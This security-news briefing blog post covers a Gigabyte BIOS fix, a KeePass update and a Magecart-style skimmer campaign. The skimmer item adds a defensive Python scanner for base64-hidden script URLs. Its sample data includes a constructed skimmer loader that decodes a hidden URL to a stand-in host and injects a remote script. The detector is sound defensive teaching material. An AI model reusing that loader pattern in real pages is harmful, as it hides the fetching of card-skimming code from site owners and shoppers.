Blog entry by Les Bell

by Les Bell - Tuesday, June 6, 2023, 7:15 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Gigabyte UEFI BIOS Fix Release

Last Friday, we brought you news of a vulnerability in the UEFI BIOS of Gigabyte motherboards which could allow attackers to inject a UEFI bootloader via a MitM attack. The good news is that Gigabyte has now released an updated BIOS which has implemented stricter security checks during the boot process, specifically:

  • Signature verification - files downloaded from remote servers are now validated by checking their signatures, and
  • Privilege Access Limitations - stronger verification of remote server certificates

Security-conscious users might wish that Gigabyte had removed this automatic downloading feature completely - but then, not everyone is as conscientious about patching their systems, so an automatic process is perhaps necessary in some environments.

Uncredited, Gigabyte Fortifies System Security with Latest BIOS Updates and Enhanced Verification, press release, 1 June 2023. Available online at https://www.gigabyte.com/Press/News/2091.

KeePass Vulnerability Fixed

Another good news story: the keepers of the KeePass project - a password safe program favoured by a number of security pros in our circle - have released KeePass version 2.54, which fixes an in-memory master password exposure problem we reported on back in mid-May.

The new release also features some user interface and integration enhancements. There are some issues that existing users may need to pay attention to, involving triggers, global URL overrides and password generator profiles, which are now saved to the enforced configuration file - users who had not previously saved these to that file will find that they have been disabled until they reconfigure their individual settings.

Uncredited, KeePass 2.54 released, news release, 3 June 2023. Available online at https://keepass.info/news/n230603_2.54.html.

Merchant Servers Abused by Skimmer Campaign

Researchers at Akamai have discovered and analysed a new Magecart-style web skimmer campaign which steals PII and credit card information from a variety of e-commerce web sites running the popular Magento, WooCommerce WordPress and Shopify platforms across North America, Latin America and Europe. Some of the sites are estimated to handle hundreds of thousands of visitors per month, and these customers' information and credit card details could end up on the dark web.

The attack involves two sets of servers:

  • host victims - legitimate web sites which are hijacked in order to host the malicious JavaScript code which will be delivered to the victims; being legitimate businesses, these sites are less likely to arouse suspicion. Some of the host victims are themselves e-commerce sites which were compromised by the skimmer attack and then abused a second time to spread the attack malware.
  • web skimming victims - the vulnerable merchant servers which are targeted by the skimming attack. Rather than injecting the attack code directly into these sites, the attackers employ small JavaScript snippets to fetch their malware from the host victim sites, thereby concealing the malicious activity.

The injected snippets are intentionally designed to resemble popular third-party campaign tracking services such as Google Tag Manager and Facebook Pixel, and the URLs of the host victim web sites are further obfuscated with base64 encoding.

The Akamai report suggests various mitigations, such as implementing a web application firewall.
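A simple defender-side check that follows from the description above: scan a page's inline scripts for quoted base64 tokens that decode to a URL and flag any whose host is not on the site's own allowlist of tag-manager and first-party hosts. This is an added example, not code from the Akamai report or from any merchant platform; the sample snippets, the allowlist and the host name compromised-host.example are all constructed for illustration.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed allowlist (assumption): hosts this shop legitimately loads scripts from.
ALLOWED_HOSTS = {"www.googletagmanager.com", "connect.facebook.net", "shop.example"}

# A quoted run of base64 characters long enough to hold a URL.
B64_TOKEN_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
# Typical dynamic-loader idioms used to inject a remote script tag.
LOADER_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|\.src\s*=|atob\(")


def decode_candidate(token):
    """Return the decoded text if the token is valid base64 for a URL, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # not base64, or binary payload (e.g. an image)
        return None
    return text if text.startswith(("http://", "https://", "//")) else None


def find_hidden_loaders(scripts, allowed_hosts=ALLOWED_HOSTS):
    """Flag inline scripts carrying a base64-encoded URL to a host outside the allowlist."""
    findings = []
    for idx, script in enumerate(scripts):
        for token in B64_TOKEN_RE.findall(script):
            url = decode_candidate(token)
            if url is None:
                continue
            # Scheme-relative URLs ("//host/path") need a scheme before urlparse sees a host.
            host = urlparse("https:" + url if url.startswith("//") else url).hostname
            if host not in allowed_hosts:
                findings.append({
                    "script": idx,
                    "encoded": token,
                    "url": url,
                    "host": host,
                    "loader": bool(LOADER_RE.search(script)),
                })
    return findings


# Constructed sample inline scripts: a normal Google Tag Manager snippet, a skimmer-style
# loader that hides its host behind base64, and a harmless inline image blob.
_HIDDEN_URL = base64.b64encode(b"https://compromised-host.example/js/gtm.js").decode()
SAMPLE_SCRIPTS = [
    "(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),"
    "event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s);"
    "j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);"
    "})(window,document,'script','dataLayer','GTM-CONSTRUCTED');",
    "(function(){var u=atob(\"" + _HIDDEN_URL + "\");var s=document.createElement('script');"
    "s.src=u;document.head.appendChild(s);})();",
    "var logo=\"iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB\";",
]


def scan_sample():
    """Run the scanner over the constructed samples."""
    return find_hidden_loaders(SAMPLE_SCRIPTS)


if __name__ == "__main__":
    for finding in scan_sample():
        print(f"script #{finding['script']}: hidden URL {finding['url']} "
              f"(host {finding['host']}, loader idiom: {finding['loader']})")
```

Only the second snippet is reported: the genuine GTM loader uses a plain URL to an allowlisted host, and the image blob decodes to binary rather than a URL. Run against scripts extracted from a live checkout page, this would sit alongside, not replace, the WAF the report recommends.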

Lvovsky, Roman, New Magecart-Style Campaign Abusing Legitimate Websites to Attack Others, blog post, 1 June 2023. Available online at https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
